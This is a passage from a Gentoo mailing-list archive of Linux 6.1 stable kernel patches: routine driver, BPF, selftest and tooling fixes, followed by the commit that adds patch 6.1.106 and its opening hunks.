+ 	avc_copy_xperms_decision(&dest_xpd->xpd, src);
+ 	list_add(&dest_xpd->xpd_list, &node->ae.xp_node->xpd_head);
++	node->ae.xp_node->xp.len++;
+ 	return 0;
+ }
+ 
+diff --git a/sound/core/timer.c b/sound/core/timer.c
+index 38f3b30efae70..ecad57a1bc5b8 100644
+--- a/sound/core/timer.c
++++ b/sound/core/timer.c
+@@ -556,7 +556,7 @@ static int snd_timer_start1(struct snd_timer_instance *timeri,
+ 	/* check the actual time for the start tick;
+ 	 * bail out as error if it's way too low (< 100us)
+ 	 */
+-	if (start) {
++	if (start && !(timer->hw.flags & SNDRV_TIMER_HW_SLAVE)) {
+ 		if ((u64)snd_timer_hw_resolution(timer) * ticks < 100000) {
+ 			result = -EINVAL;
+ 			goto unlock;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 93d65a1acc475..b942ed868070d 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -583,7 +583,6 @@ static void alc_shutup_pins(struct hda_codec *codec)
+ 	switch (codec->core.vendor_id) {
+ 	case 0x10ec0236:
+ 	case 0x10ec0256:
+-	case 0x10ec0257:
+ 	case 0x19e58326:
+ 	case 0x10ec0283:
+ 	case 0x10ec0285:
+diff --git a/sound/soc/sof/ipc4.c b/sound/soc/sof/ipc4.c
+index 06e1872abfee7..1449837b0fb2c 100644
+--- a/sound/soc/sof/ipc4.c
++++ b/sound/soc/sof/ipc4.c
+@@ -616,7 +616,14 @@ static void sof_ipc4_rx_msg(struct snd_sof_dev *sdev)
+ 			return;
+ 
+ 		ipc4_msg->data_size = data_size;
+-		snd_sof_ipc_msg_data(sdev, NULL, ipc4_msg->data_ptr, ipc4_msg->data_size);
++		err = snd_sof_ipc_msg_data(sdev, NULL, ipc4_msg->data_ptr, ipc4_msg->data_size);
++		if (err < 0) {
++			dev_err(sdev->dev, "failed to read IPC notification data: %d\n", err);
++			kfree(ipc4_msg->data_ptr);
++			ipc4_msg->data_ptr = NULL;
++			ipc4_msg->data_size = 0;
++			return;
++		}
+ 	}
+ 
+ 	sof_ipc4_log_header(sdev->dev, "ipc rx done ", ipc4_msg, true);
+diff --git a/sound/usb/mixer.c b/sound/usb/mixer.c
+index 5699a62d17679..34ded71cb8077 100644
+--- a/sound/usb/mixer.c
++++ b/sound/usb/mixer.c
+@@ -2023,6 +2023,13 @@ static int parse_audio_feature_unit(struct mixer_build *state, int unitid,
+ 		bmaControls = ftr->bmaControls;
+ 	}
+ 
++	if (channels > 32) {
++		usb_audio_info(state->chip,
++			       "usbmixer: too many channels (%d) in unit %d\n",
++			       channels, unitid);
++		return -EINVAL;
++	}
++
+ 	/* parse the source unit */
+ 	err = parse_audio_unit(state, hdr->bSourceID);
+ 	if (err < 0)
+diff --git a/sound/usb/quirks-table.h b/sound/usb/quirks-table.h
+index af1b8cf5a9883..d2aa97a5c438c 100644
+--- a/sound/usb/quirks-table.h
++++ b/sound/usb/quirks-table.h
+@@ -273,6 +273,7 @@ YAMAHA_DEVICE(0x105a, NULL),
+ YAMAHA_DEVICE(0x105b, NULL),
+ YAMAHA_DEVICE(0x105c, NULL),
+ YAMAHA_DEVICE(0x105d, NULL),
++YAMAHA_DEVICE(0x1718, "P-125"),
+ {
+ 	USB_DEVICE(0x0499, 0x1503),
+ 	.driver_info = (unsigned long) & (const struct snd_usb_audio_quirk) {
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 733a25275fe9f..f9ba10d4f1e18 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2179,6 +2179,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+ 	DEVICE_FLG(0x2b53, 0x0031, /* Fiero SC-01 (firmware v1.1.0) */
+ 		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
++	DEVICE_FLG(0x2d95, 0x8021, /* VIVO USB-C-XE710 HEADSET */
++		   QUIRK_FLAG_CTL_MSG_DELAY_1M),
+ 	DEVICE_FLG(0x30be, 0x0101, /* Schiit Hel */
+ 		   QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x413c, 0xa506, /* Dell AE515 sound bar */
+diff --git a/tools/include/linux/align.h b/tools/include/linux/align.h
+new file mode 100644
+index 0000000000000..14e34ace80dda
+--- /dev/null
++++ b/tools/include/linux/align.h
+@@ -0,0 +1,12 @@
++/* SPDX-License-Identifier: GPL-2.0-only */
++
++#ifndef _TOOLS_LINUX_ALIGN_H
++#define _TOOLS_LINUX_ALIGN_H
++
++#include <uapi/linux/const.h>
++
++#define ALIGN(x, a)		__ALIGN_KERNEL((x), (a))
++#define ALIGN_DOWN(x, a)	__ALIGN_KERNEL((x) - ((a) - 1), (a))
++#define IS_ALIGNED(x, a)	(((x) & ((typeof(x))(a) - 1)) == 0)
++
++#endif /* _TOOLS_LINUX_ALIGN_H */
+diff --git a/tools/include/linux/bitmap.h b/tools/include/linux/bitmap.h
+index 65d0747c5205c..2cbabc1dcf0fd 100644
+--- a/tools/include/linux/bitmap.h
++++ b/tools/include/linux/bitmap.h
+@@ -3,6 +3,7 @@
+ #define _TOOLS_LINUX_BITMAP_H
+ 
+ #include <string.h>
++#include <linux/align.h>
+ #include <linux/bitops.h>
+ #include <linux/find.h>
+ #include <stdlib.h>
+@@ -25,13 +26,14 @@ bool __bitmap_intersects(const unsigned long *bitmap1,
+ #define BITMAP_FIRST_WORD_MASK(start) (~0UL << ((start) & (BITS_PER_LONG - 1)))
+ #define BITMAP_LAST_WORD_MASK(nbits) (~0UL >> (-(nbits) & (BITS_PER_LONG - 1)))
+ 
++#define bitmap_size(nbits)	(ALIGN(nbits, BITS_PER_LONG) / BITS_PER_BYTE)
++
+ static inline void bitmap_zero(unsigned long *dst, unsigned int nbits)
+ {
+ 	if (small_const_nbits(nbits))
+ 		*dst = 0UL;
+ 	else {
+-		int len = BITS_TO_LONGS(nbits) * sizeof(unsigned long);
+-		memset(dst, 0, len);
++		memset(dst, 0, bitmap_size(nbits));
+ 	}
+ }
+ 
+@@ -117,7 +119,7 @@ static inline int test_and_clear_bit(int nr, unsigned long *addr)
+  */
+ static inline unsigned long *bitmap_zalloc(int nbits)
+ {
+-	return calloc(1, BITS_TO_LONGS(nbits) * sizeof(unsigned long));
++	return calloc(1, bitmap_size(nbits));
+ }
+ 
+ /*
+@@ -160,7 +162,6 @@ static inline bool bitmap_and(unsigned long *dst, const unsigned long *src1,
+ #define BITMAP_MEM_ALIGNMENT (8 * sizeof(unsigned long))
+ #endif
+ #define BITMAP_MEM_MASK (BITMAP_MEM_ALIGNMENT - 1)
+-#define IS_ALIGNED(x, a) (((x) & ((typeof(x))(a) - 1)) == 0)
+ 
+ static inline bool bitmap_equal(const unsigned long *src1,
+ 				const unsigned long *src2, unsigned int nbits)
+diff --git a/tools/include/linux/mm.h b/tools/include/linux/mm.h
+index 2f401e8c6c0bb..66ca5f9a0e093 100644
+--- a/tools/include/linux/mm.h
++++ b/tools/include/linux/mm.h
+@@ -2,8 +2,8 @@
+ #ifndef _TOOLS_LINUX_MM_H
+ #define _TOOLS_LINUX_MM_H
+ 
++#include <linux/align.h>
+ #include <linux/mmzone.h>
+-#include <uapi/linux/const.h>
+ 
+ #define PAGE_SHIFT		12
+ #define PAGE_SIZE		(_AC(1, UL) << PAGE_SHIFT)
+@@ -11,9 +11,6 @@
+ 
+ #define PHYS_ADDR_MAX	(~(phys_addr_t)0)
+ 
+-#define ALIGN(x, a)			__ALIGN_KERNEL((x), (a))
+-#define ALIGN_DOWN(x, a)		__ALIGN_KERNEL((x) - ((a) - 1), (a))
+-
+ #define PAGE_ALIGN(addr) ALIGN(addr, PAGE_SIZE)
+ 
+ #define __va(x) ((void *)((unsigned long)(x)))
+diff --git a/tools/include/uapi/linux/bpf.h b/tools/include/uapi/linux/bpf.h
+index a17688011440e..58c7fc75da752 100644
+--- a/tools/include/uapi/linux/bpf.h
++++ b/tools/include/uapi/linux/bpf.h
+@@ -76,12 +76,29 @@ struct bpf_insn {
+ 	__s32	imm;		/* signed immediate constant */
+ };
+ 
+-/* Key of an a BPF_MAP_TYPE_LPM_TRIE entry */
++/* Deprecated: use struct bpf_lpm_trie_key_u8 (when the "data" member is needed for
++ * byte access) or struct bpf_lpm_trie_key_hdr (when using an alternative type for
++ * the trailing flexible array member) instead.
++ */
+ struct bpf_lpm_trie_key {
+ 	__u32	prefixlen;	/* up to 32 for AF_INET, 128 for AF_INET6 */
+ 	__u8	data[0];	/* Arbitrary size */
+ };
+ 
++/* Header for bpf_lpm_trie_key structs */
++struct bpf_lpm_trie_key_hdr {
++	__u32	prefixlen;
++};
++
++/* Key of an a BPF_MAP_TYPE_LPM_TRIE entry, with trailing byte array. */
++struct bpf_lpm_trie_key_u8 {
++	union {
++		struct bpf_lpm_trie_key_hdr	hdr;
++		__u32				prefixlen;
++	};
++	__u8	data[];		/* Arbitrary size */
++};
++
+ struct bpf_cgroup_storage_key {
+ 	__u64	cgroup_inode_id;	/* cgroup inode id */
+ 	__u32	attach_type;		/* program attach type (enum bpf_attach_type) */
+diff --git a/tools/testing/selftests/bpf/progs/map_ptr_kern.c b/tools/testing/selftests/bpf/progs/map_ptr_kern.c
+index db388f593d0a2..96eed198af361 100644
+--- a/tools/testing/selftests/bpf/progs/map_ptr_kern.c
++++ b/tools/testing/selftests/bpf/progs/map_ptr_kern.c
+@@ -311,7 +311,7 @@ struct lpm_trie {
+ } __attribute__((preserve_access_index));
+ 
+ struct lpm_key {
+-	struct bpf_lpm_trie_key trie_key;
++	struct bpf_lpm_trie_key_hdr trie_key;
+ 	__u32 data;
+ };
+ 
+diff --git a/tools/testing/selftests/bpf/test_lpm_map.c b/tools/testing/selftests/bpf/test_lpm_map.c
+index c028d621c744d..d98c72dc563ea 100644
+--- a/tools/testing/selftests/bpf/test_lpm_map.c
++++ b/tools/testing/selftests/bpf/test_lpm_map.c
+@@ -211,7 +211,7 @@ static void test_lpm_map(int keysize)
+ 	volatile size_t n_matches, n_matches_after_delete;
+ 	size_t i, j, n_nodes, n_lookups;
+ 	struct tlpm_node *t, *list = NULL;
+-	struct bpf_lpm_trie_key *key;
++	struct bpf_lpm_trie_key_u8 *key;
+ 	uint8_t *data, *value;
+ 	int r, map;
+ 
+@@ -331,8 +331,8 @@ static void test_lpm_map(int keysize)
+ static void test_lpm_ipaddr(void)
+ {
+ 	LIBBPF_OPTS(bpf_map_create_opts, opts, .map_flags = BPF_F_NO_PREALLOC);
+-	struct bpf_lpm_trie_key *key_ipv4;
+-	struct bpf_lpm_trie_key *key_ipv6;
++	struct bpf_lpm_trie_key_u8 *key_ipv4;
++	struct bpf_lpm_trie_key_u8 *key_ipv6;
+ 	size_t key_size_ipv4;
+ 	size_t key_size_ipv6;
+ 	int map_fd_ipv4;
+@@ -423,7 +423,7 @@ static void test_lpm_ipaddr(void)
+ static void test_lpm_delete(void)
+ {
+ 	LIBBPF_OPTS(bpf_map_create_opts, opts, .map_flags = BPF_F_NO_PREALLOC);
+-	struct bpf_lpm_trie_key *key;
++	struct bpf_lpm_trie_key_u8 *key;
+ 	size_t key_size;
+ 	int map_fd;
+ 	__u64 value;
+@@ -532,7 +532,7 @@ static void test_lpm_delete(void)
+ static void test_lpm_get_next_key(void)
+ {
+ 	LIBBPF_OPTS(bpf_map_create_opts, opts, .map_flags = BPF_F_NO_PREALLOC);
+-	struct bpf_lpm_trie_key *key_p, *next_key_p;
++	struct bpf_lpm_trie_key_u8 *key_p, *next_key_p;
+ 	size_t key_size;
+ 	__u32 value = 0;
+ 	int map_fd;
+@@ -693,9 +693,9 @@ static void *lpm_test_command(void *arg)
+ {
+ 	int i, j, ret, iter, key_size;
+ 	struct lpm_mt_test_info *info = arg;
+-	struct bpf_lpm_trie_key *key_p;
++	struct bpf_lpm_trie_key_u8 *key_p;
+ 
+-	key_size = sizeof(struct bpf_lpm_trie_key) + sizeof(__u32);
++	key_size = sizeof(*key_p) + sizeof(__u32);
+ 	key_p = alloca(key_size);
+ 	for (iter = 0; iter < info->iter; iter++)
+ 		for (i = 0; i < MAX_TEST_KEYS; i++) {
+@@ -717,7 +717,7 @@ static void *lpm_test_command(void *arg)
+ 				ret = bpf_map_lookup_elem(info->map_fd, key_p, &value);
+ 				assert(ret == 0 || errno == ENOENT);
+ 			} else {
+-				struct bpf_lpm_trie_key *next_key_p = alloca(key_size);
++				struct bpf_lpm_trie_key_u8 *next_key_p = alloca(key_size);
+ 				ret = bpf_map_get_next_key(info->map_fd, key_p, next_key_p);
+ 				assert(ret == 0 || errno == ENOENT || errno == ENOMEM);
+ 			}
+@@ -752,7 +752,7 @@ static void test_lpm_multi_thread(void)
+ 
+ 	/* create a trie */
+ 	value_size = sizeof(__u32);
+-	key_size = sizeof(struct bpf_lpm_trie_key) + value_size;
++	key_size = sizeof(struct bpf_lpm_trie_key_hdr) + value_size;
+ 	map_fd = bpf_map_create(BPF_MAP_TYPE_LPM_TRIE, NULL, key_size, value_size, 100, &opts);
+ 
+ 	/* create 4 threads to test update, delete, lookup and get_next_key */
+diff --git a/tools/testing/selftests/core/close_range_test.c b/tools/testing/selftests/core/close_range_test.c
+index 749239930ca83..190c57b0efeba 100644
+--- a/tools/testing/selftests/core/close_range_test.c
++++ b/tools/testing/selftests/core/close_range_test.c
+@@ -563,4 +563,39 @@ TEST(close_range_cloexec_unshare_syzbot)
+ 	EXPECT_EQ(close(fd3), 0);
+ }
+ 
++TEST(close_range_bitmap_corruption)
++{
++	pid_t pid;
++	int status;
++	struct __clone_args args = {
++		.flags = CLONE_FILES,
++		.exit_signal = SIGCHLD,
++	};
++
++	/* get the first 128 descriptors open */
++	for (int i = 2; i < 128; i++)
++		EXPECT_GE(dup2(0, i), 0);
++
++	/* get descriptor table shared */
++	pid = sys_clone3(&args, sizeof(args));
++	ASSERT_GE(pid, 0);
++
++	if (pid == 0) {
++		/* unshare and truncate descriptor table down to 64 */
++		if (sys_close_range(64, ~0U, CLOSE_RANGE_UNSHARE))
++			exit(EXIT_FAILURE);
++
++		ASSERT_EQ(fcntl(64, F_GETFD), -1);
++		/* ... and verify that the range 64..127 is not
++		   stuck "fully used" according to secondary bitmap */
++		EXPECT_EQ(dup(0), 64)
++			exit(EXIT_FAILURE);
++		exit(EXIT_SUCCESS);
++	}
++
++	EXPECT_EQ(waitpid(pid, &status, 0), pid);
++	EXPECT_EQ(true, WIFEXITED(status));
++	EXPECT_EQ(0, WEXITSTATUS(status));
++}
++
+ TEST_HARNESS_MAIN
+diff --git a/tools/testing/selftests/net/net_helper.sh b/tools/testing/selftests/net/net_helper.sh
+new file mode 100755
+index 0000000000000..6596fe03c77f4
+--- /dev/null
++++ b/tools/testing/selftests/net/net_helper.sh
+@@ -0,0 +1,25 @@
++#!/bin/bash
++# SPDX-License-Identifier: GPL-2.0
++#
++# Helper functions
++
++wait_local_port_listen()
++{
++	local listener_ns="${1}"
++	local port="${2}"
++	local protocol="${3}"
++	local pattern
++	local i
++
++	pattern=":$(printf "%04X" "${port}") "
++
++	# for tcp protocol additionally check the socket state
++	[ ${protocol} = "tcp" ] && pattern="${pattern}0A"
++	for i in $(seq 10); do
++		if ip netns exec "${listener_ns}" awk '{print $2" "$4}' \
++		   /proc/net/"${protocol}"* | grep -q "${pattern}"; then
++			break
++		fi
++		sleep 0.1
++	done
++}
+diff --git a/tools/testing/selftests/net/udpgro.sh b/tools/testing/selftests/net/udpgro.sh
+index 0c743752669af..241c6c37994d8 100755
+--- a/tools/testing/selftests/net/udpgro.sh
++++ b/tools/testing/selftests/net/udpgro.sh
+@@ -3,6 +3,8 @@
+ #
+ # Run a series of udpgro functional tests.
+ 
++source net_helper.sh
++
+ readonly PEER_NS="ns-peer-$(mktemp -u XXXXXX)"
+ 
+ BPF_FILE="../bpf/xdp_dummy.bpf.o"
+@@ -44,18 +46,19 @@ run_one() {
+ 	local -r all="$@"
+ 	local -r tx_args=${all%rx*}
+ 	local -r rx_args=${all#*rx}
++	local ret=0
+ 
+ 	cfg_veth
+ 
+-	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -C 1000 -R 10 ${rx_args} && \
+-		echo "ok" || \
+-		echo "failed" &
++	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -C 1000 -R 10 ${rx_args} &
++	local PID1=$!
+ 
+-	# Hack: let bg programs complete the startup
+-	sleep 0.2
++	wait_local_port_listen ${PEER_NS} 8000 udp
+ 	./udpgso_bench_tx ${tx_args}
+-	ret=$?
+-	wait $(jobs -p)
++	check_err $?
++	wait ${PID1}
++	check_err $?
++	[ "$ret" -eq 0 ] && echo "ok" || echo "failed"
+ 	return $ret
+ }
+ 
+@@ -72,6 +75,7 @@ run_one_nat() {
+ 	local -r all="$@"
+ 	local -r tx_args=${all%rx*}
+ 	local -r rx_args=${all#*rx}
++	local ret=0
+ 
+ 	if [[ ${tx_args} = *-4* ]]; then
+ 		ipt_cmd=iptables
+@@ -92,16 +96,17 @@ run_one_nat() {
+ 	# ... so that GRO will match the UDP_GRO enabled socket, but packets
+ 	# will land on the 'plain' one
+ 	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -G ${family} -b ${addr1} -n 0 &
+-	pid=$!
+-	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -C 1000 -R 10 ${family} -b ${addr2%/*} ${rx_args} && \
+-		echo "ok" || \
+-		echo "failed"&
++	local PID1=$!
++	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -C 1000 -R 10 ${family} -b ${addr2%/*} ${rx_args} &
++	local PID2=$!
+ 
+-	sleep 0.1
++	wait_local_port_listen "${PEER_NS}" 8000 udp
+ 	./udpgso_bench_tx ${tx_args}
+-	ret=$?
+-	kill -INT $pid
+-	wait $(jobs -p)
++	check_err $?
++	kill -INT ${PID1}
++	wait ${PID2}
++	check_err $?
++	[ "$ret" -eq 0 ] && echo "ok" || echo "failed"
+ 	return $ret
+ }
+ 
+@@ -110,22 +115,26 @@ run_one_2sock() {
+ 	local -r all="$@"
+ 	local -r tx_args=${all%rx*}
+ 	local -r rx_args=${all#*rx}
++	local ret=0
+ 
+ 	cfg_veth
+ 
+ 	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -C 1000 -R 10 ${rx_args} -p 12345 &
+-	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -C 2000 -R 10 ${rx_args} && \
+-		echo "ok" || \
+-		echo "failed" &
++	local PID1=$!
++	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -C 2000 -R 10 ${rx_args} &
++	local PID2=$!
+ 
+-	# Hack: let bg programs complete the startup
+-	sleep 0.2
++	wait_local_port_listen "${PEER_NS}" 12345 udp
+ 	./udpgso_bench_tx ${tx_args} -p 12345
+-	sleep 0.1
+-	# first UDP GSO socket should be closed at this point
++	check_err $?
++	wait_local_port_listen "${PEER_NS}" 8000 udp
+ 	./udpgso_bench_tx ${tx_args}
+-	ret=$?
+-	wait $(jobs -p)
++	check_err $?
++	wait ${PID1}
++	check_err $?
++	wait ${PID2}
++	check_err $?
++	[ "$ret" -eq 0 ] && echo "ok" || echo "failed"
+ 	return $ret
+ }
+ 
+diff --git a/tools/testing/selftests/net/udpgro_bench.sh b/tools/testing/selftests/net/udpgro_bench.sh
+index 894972877e8b0..cb664679b4342 100755
+--- a/tools/testing/selftests/net/udpgro_bench.sh
++++ b/tools/testing/selftests/net/udpgro_bench.sh
+@@ -3,6 +3,8 @@
+ #
+ # Run a series of udpgro benchmarks
+ 
++source net_helper.sh
++
+ readonly PEER_NS="ns-peer-$(mktemp -u XXXXXX)"
+ 
+ BPF_FILE="../bpf/xdp_dummy.bpf.o"
+@@ -40,8 +42,7 @@ run_one() {
+ 	ip netns exec "${PEER_NS}" ./udpgso_bench_rx ${rx_args} -r &
+ 	ip netns exec "${PEER_NS}" ./udpgso_bench_rx -t ${rx_args} -r &
+ 
+-	# Hack: let bg programs complete the startup
+-	sleep 0.2
++	wait_local_port_listen "${PEER_NS}" 8000 udp
+ 	./udpgso_bench_tx ${tx_args}
+ }
+ 
+diff --git a/tools/testing/selftests/net/udpgro_frglist.sh b/tools/testing/selftests/net/udpgro_frglist.sh
+index 0a6359bed0b92..dd47fa96f6b3e 100755
+--- a/tools/testing/selftests/net/udpgro_frglist.sh
++++ b/tools/testing/selftests/net/udpgro_frglist.sh
+@@ -3,6 +3,8 @@
+ #
+ # Run a series of udpgro benchmarks
+ 
++source net_helper.sh
++
+ readonly PEER_NS="ns-peer-$(mktemp -u XXXXXX)"
+ 
+ BPF_FILE="../bpf/xdp_dummy.bpf.o"
+@@ -45,8 +47,7 @@ run_one() {
+         echo ${rx_args}
+ 	ip netns exec "${PEER_NS}" ./udpgso_bench_rx ${rx_args} -r &
+ 
+-	# Hack: let bg programs complete the startup
+-	sleep 0.2
++	wait_local_port_listen "${PEER_NS}" 8000 udp
+ 	./udpgso_bench_tx ${tx_args}
+ }
+ 
+diff --git a/tools/testing/selftests/net/udpgso.c b/tools/testing/selftests/net/udpgso.c
+index 7badaf215de28..b02080d09fbc0 100644
+--- a/tools/testing/selftests/net/udpgso.c
++++ b/tools/testing/selftests/net/udpgso.c
+@@ -34,7 +34,7 @@
+ #endif
+ 
+ #ifndef UDP_MAX_SEGMENTS
+-#define UDP_MAX_SEGMENTS	(1 << 6UL)
++#define UDP_MAX_SEGMENTS	(1 << 7UL)
+ #endif
+ 
+ #define CONST_MTU_TEST	1500
+diff --git a/tools/testing/selftests/tc-testing/tdc.py b/tools/testing/selftests/tc-testing/tdc.py
+index ee22e3447ec7e..4702c99c99d3f 100755
+--- a/tools/testing/selftests/tc-testing/tdc.py
++++ b/tools/testing/selftests/tc-testing/tdc.py
+@@ -129,7 +129,6 @@ class PluginMgr:
+             except Exception as ee:
+                 print('exception {} in call to pre_case for {} plugin'.
+                       format(ee, pgn_inst.__class__))
+-                print('test_ordinal is {}'.format(test_ordinal))
+                 print('testid is {}'.format(caseinfo['id']))
+                 raise
+ 
+diff --git a/tools/tracing/rtla/src/osnoise_top.c b/tools/tracing/rtla/src/osnoise_top.c
+index 6c07f360de72c..2e3c70723fdc7 100644
+--- a/tools/tracing/rtla/src/osnoise_top.c
++++ b/tools/tracing/rtla/src/osnoise_top.c
+@@ -520,8 +520,10 @@ struct osnoise_tool *osnoise_init_top(struct osnoise_top_params *params)
+ 		return NULL;
+ 
+ 	tool->data = osnoise_alloc_top(nr_cpus);
+-	if (!tool->data)
+-		goto out_err;
++	if (!tool->data) {
++		osnoise_destroy_tool(tool);
++		return NULL;
++	}
+ 
+ 	tool->params = params;
+ 
+@@ -529,11 +531,6 @@ struct osnoise_tool *osnoise_init_top(struct osnoise_top_params *params)
+ 				   osnoise_top_handler, NULL);
+ 
+ 	return tool;
+-
+-out_err:
+-	osnoise_free_top(tool->data);
+-	osnoise_destroy_tool(tool);
+-	return NULL;
+ }
+ 
+ static int stop_tracing;


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-19 10:43 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-19 10:43 UTC (permalink / raw
  To: gentoo-commits

commit:     62f59f27365115a6367aa87ed41ac365298980f6
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Aug 19 10:42:53 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Aug 19 10:42:53 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=62f59f27

Linux patch 6.1.106

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    8 +
 1105_linux-6.1.106.patch | 2097 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2105 insertions(+)

diff --git a/0000_README b/0000_README
index a89ea6e6..5002259e 100644
--- a/0000_README
+++ b/0000_README
@@ -463,6 +463,14 @@ Patch:  1104_linux-6.1.105.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.105
 
+Patch:  1104_linux-6.1.105.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.105
+
+Patch:  1105_linux-6.1.106.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.106
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1105_linux-6.1.106.patch b/1105_linux-6.1.106.patch
new file mode 100644
index 00000000..b7a2cc75
--- /dev/null
+++ b/1105_linux-6.1.106.patch
@@ -0,0 +1,2097 @@
+diff --git a/Makefile b/Makefile
+index 08ca316cb46dcf..f0fd656e9da3c0 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 105
++SUBLEVEL = 106
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/kvm/hyp/pgtable.c b/arch/arm64/kvm/hyp/pgtable.c
+index ae5f6b5ac80fd3..f0167dc7438f8a 100644
+--- a/arch/arm64/kvm/hyp/pgtable.c
++++ b/arch/arm64/kvm/hyp/pgtable.c
+@@ -475,7 +475,7 @@ static int hyp_unmap_walker(u64 addr, u64 end, u32 level, kvm_pte_t *ptep,
+ 
+ 		kvm_clear_pte(ptep);
+ 		dsb(ishst);
+-		__tlbi_level(vae2is, __TLBI_VADDR(addr, 0), level);
++		__tlbi_level(vae2is, __TLBI_VADDR(addr, 0), 0);
+ 	} else {
+ 		if (end - addr < granule)
+ 			return -EINVAL;
+@@ -699,8 +699,14 @@ static void stage2_put_pte(kvm_pte_t *ptep, struct kvm_s2_mmu *mmu, u64 addr,
+ 	 * Clear the existing PTE, and perform break-before-make with
+ 	 * TLB maintenance if it was valid.
+ 	 */
+-	if (kvm_pte_valid(*ptep)) {
++	kvm_pte_t pte = *ptep;
++
++	if (kvm_pte_valid(pte)) {
+ 		kvm_clear_pte(ptep);
++
++		if (kvm_pte_table(pte, level))
++			level = 0;
++
+ 		kvm_call_hyp(__kvm_tlb_flush_vmid_ipa, mmu, addr, level);
+ 	}
+ 
+diff --git a/arch/loongarch/include/uapi/asm/unistd.h b/arch/loongarch/include/uapi/asm/unistd.h
+index fcb668984f0336..b344b1f917153b 100644
+--- a/arch/loongarch/include/uapi/asm/unistd.h
++++ b/arch/loongarch/include/uapi/asm/unistd.h
+@@ -1,4 +1,5 @@
+ /* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
++#define __ARCH_WANT_NEW_STAT
+ #define __ARCH_WANT_SYS_CLONE
+ #define __ARCH_WANT_SYS_CLONE3
+ 
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index c8970453b4d9f5..0e71b8763c4cb6 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -900,8 +900,19 @@ static void ata_gen_passthru_sense(struct ata_queued_cmd *qc)
+ 				   &sense_key, &asc, &ascq, verbose);
+ 		ata_scsi_set_sense(qc->dev, cmd, sense_key, asc, ascq);
+ 	} else {
+-		/* ATA PASS-THROUGH INFORMATION AVAILABLE */
+-		ata_scsi_set_sense(qc->dev, cmd, RECOVERED_ERROR, 0, 0x1D);
++		/*
++		 * ATA PASS-THROUGH INFORMATION AVAILABLE
++		 *
++		 * Note: we are supposed to call ata_scsi_set_sense(), which
++		 * respects the D_SENSE bit, instead of unconditionally
++		 * generating the sense data in descriptor format. However,
++		 * because hdparm, hddtemp, and udisks incorrectly assume sense
++		 * data in descriptor format, without even looking at the
++		 * RESPONSE CODE field in the returned sense data (to see which
++		 * format the returned sense data is in), we are stuck with
++		 * being bug compatible with older kernels.
++		 */
++		scsi_build_sense(cmd, 1, RECOVERED_ERROR, 0, 0x1D);
+ 	}
+ 
+ 	if ((cmd->sense_buffer[0] & 0x7f) >= 0x72) {
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_mman.c b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+index d7e30d889a5ca5..7e9310d01dfdd2 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_mman.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+@@ -290,6 +290,41 @@ static vm_fault_t vm_fault_cpu(struct vm_fault *vmf)
+ 	return i915_error_to_vmf_fault(err);
+ }
+ 
++static void set_address_limits(struct vm_area_struct *area,
++			       struct i915_vma *vma,
++			       unsigned long obj_offset,
++			       unsigned long *start_vaddr,
++			       unsigned long *end_vaddr)
++{
++	unsigned long vm_start, vm_end, vma_size; /* user's memory parameters */
++	long start, end; /* memory boundaries */
++
++	/*
++	 * Let's move into the ">> PAGE_SHIFT"
++	 * domain to be sure not to lose bits
++	 */
++	vm_start = area->vm_start >> PAGE_SHIFT;
++	vm_end = area->vm_end >> PAGE_SHIFT;
++	vma_size = vma->size >> PAGE_SHIFT;
++
++	/*
++	 * Calculate the memory boundaries by considering the offset
++	 * provided by the user during memory mapping and the offset
++	 * provided for the partial mapping.
++	 */
++	start = vm_start;
++	start -= obj_offset;
++	start += vma->gtt_view.partial.offset;
++	end = start + vma_size;
++
++	start = max_t(long, start, vm_start);
++	end = min_t(long, end, vm_end);
++
++	/* Let's move back into the "<< PAGE_SHIFT" domain */
++	*start_vaddr = (unsigned long)start << PAGE_SHIFT;
++	*end_vaddr = (unsigned long)end << PAGE_SHIFT;
++}
++
+ static vm_fault_t vm_fault_gtt(struct vm_fault *vmf)
+ {
